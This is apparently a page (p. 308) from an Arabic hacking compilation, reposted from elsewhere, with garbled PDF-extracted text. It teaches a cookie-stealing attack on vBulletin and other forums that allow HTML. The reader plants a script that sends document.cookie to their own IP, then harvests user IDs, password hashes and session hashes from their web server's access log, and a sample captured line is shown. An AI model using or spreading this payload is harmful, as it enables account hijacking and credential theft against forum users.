Page 308 - بسم الله الرحمن الرحيم

P. 308

‫>منقول<‬

‫‪---------‬‬
‫مقدمة ‪:‬‬
‫‪---------‬‬

‫الموضوع ‪ :‬اختتراق الـ ‪vBulletin‬‬
‫المتطلبات ‪) WebServer :‬تصركيب سيرفر على جههازك الشخصي( ‪ +‬متصفح انترنت )اكسبلورر( ‪.‬‬

‫المستوى ‪ :‬متوسط‬

‫ملحظة ‪ :‬هذه الطريقة لست للـ ‪ vBulletin‬فقط !! يمكن ان تصجربها على انواع اخترى من المنتديات ‪.‬‬

‫‪----------‬‬
‫الثغرة ‪:‬‬

‫‪---------‬‬

‫تصنقسم طريقة العمل الى عدة اقسا‪.‬م ‪ ..‬أول بعض السكربتات الخبيثة التي تصسرق الكوكيز بالضافة الى جهعل‬
‫المنتدى يستقبل‬

‫بيانات من مكان ختاطيء ‪ ..‬لكن يشترط ان يسمح المنتدى بأكواد الـ ‪.. HTML‬‬

‫قم بكتابة موضوع جهديد او رد )في منتدى يدعم الـ ‪ .. ( HTML‬ثم اكتب اي موضوع والصق بين السطور‬
‫هذا الكود ‪:‬‬

‫>‪script>document.write('<img‬‬
‫‪<src="http://my_ip_address/'+document.cookie+'">';</script‬‬

‫مع ملحظة تصغير الـ ‪ IP Adress‬الى رقم الـ ‪ IP‬الخاص بك ‪.‬‬

‫وعندما يقو‪.‬م شخص ما بقراءة محتوى الصفحة فان السكربت الذي قمنا بوضعه سيقو‪.‬م بتنفيذ الوامر في‬
‫جههاز وقراءة جهزء‬

‫من احد ملفات الكوكيز التي تصحتوي على الباسورد الخاصة بالمنتدى ‪ ..‬ثم يقو‪.‬م السكربت بتحويل هذه السطور‬
‫الى رقم‬

‫الي بي الذي قمنا بكتابته سابقا )مع ملحظة انه يجب ان يكون على جههازي سيرفر مثل ‪ IIS‬او ‪Apache‬‬
‫او غيرها ( ‪.‬‬

‫وبعد ان تصتم العملية بنجا ح قم بفتح ملف الـ ‪ Log‬الخاص بالسيرفر الذي يحتويه جههازك ‪..‬‬
‫مثال لو كان السيرفر اباتصشي ‪ ..‬فتا ح المجلد ‪ Apche‬واختتر ‪ logs‬واختتر ‪. Acces Log‬‬

‫ستجد جهميع الوامر التي طلبتها من السيرفر ‪ ..‬إلخ‬

‫ابحث عن الكود الخاص بالباسورد ‪ ..‬مثال ‪:‬‬

‫‪GET/ bbuserid=86;%20bbpassword=dd6169d68822a116cd97e1fb‬‬

‫‪ddf90622;%20sessionhash=a‬‬
‫‪4719cd620534914930b86839c4bb5f8;%20bbthreadview[54‬‬

‫‪%20bblastvi;1012444064=[20‬‬
‫‪sit=1011983161‬‬

‫‪308‬‬

303 304 305 306 307 308 309 310 311 312 313